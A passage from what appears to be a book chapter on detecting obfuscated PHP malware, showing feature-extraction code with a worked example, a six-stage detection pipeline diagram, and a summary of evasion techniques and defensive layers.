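    $blankLines = count(array_filter($lines, fn($line) => trim($line) === ''));

    return [
        'printableRatio'    => preg_match_all('/[\x20-\x7E]/', $content) / $length,
        'alphabeticRatio'   => preg_match_all('/[A-Za-z]/', $content) / $length,
        'digitRatio'        => preg_match_all('/[0-9]/', $content) / $length,
        'specialRatio'      => preg_match_all('/[^A-Za-z0-9\s]/', $content) / $length,
        'averageLineLength' => array_sum($lineLengths) / count($lines),
        'maxLineLength'     => max($lineLengths),
        'blankLineRatio'    => $blankLines / count($lines),
    ];
}

// Tiny sample: three lines ("ab1!", "", "cd"), eight bytes in total.
$features = extractBasicFeatures("ab1!\n\ncd");
```

For the tiny sample, six of the eight bytes are printable (0.75), four are letters (0.5), and one of the three lines is blank. The remaining features would come from the entropy, string, and function analyses described earlier.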

Practical implementation

Here’s how our detection pipeline works:

Input: suspicious.php
         │
         ▼
┌─────────────────────────────┐
│  1. Quick Filters           │  Skip: >1MB, non-PHP, vendor/
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  2. Signature Scan          │  87 patterns from Chapter 4
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  3. Entropy Analysis        │  5 evasion detectors
│  ├─ CommentPadding          │
│  ├─ VariableNameEngineering │
│  ├─ ChunkedPayload          │
│  ├─ StringSteganography     │
│  └─ WhitespaceManipulation  │
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  4. Behavioral Analysis     │  Data flow tracking
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  5. Weighted Scoring        │  Combine all signals
│  + Context Modifiers        │  Adjust for location
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  6. Recommendation          │  QUARANTINE/REVIEW/MONITOR/CLEAN
└─────────────────────────────┘

Summary

Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques; this chapter covered five of them, along with 15 statistical features for spotting them.

Key takeaways:

Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
Chunked payloads distribute high-entropy content across the file
String steganography hides data in invisible characters
Sliding window analysis catches local anomalies even when global entropy looks normal
Behavioral analysis detects what code does, not what it looks like
Weighted scoring combines multiple signals for accurate detection
Context modifiers prevent false positives in legitimate framework code

The lesson is clear: layers of defense, not single techniques.

Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know

Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.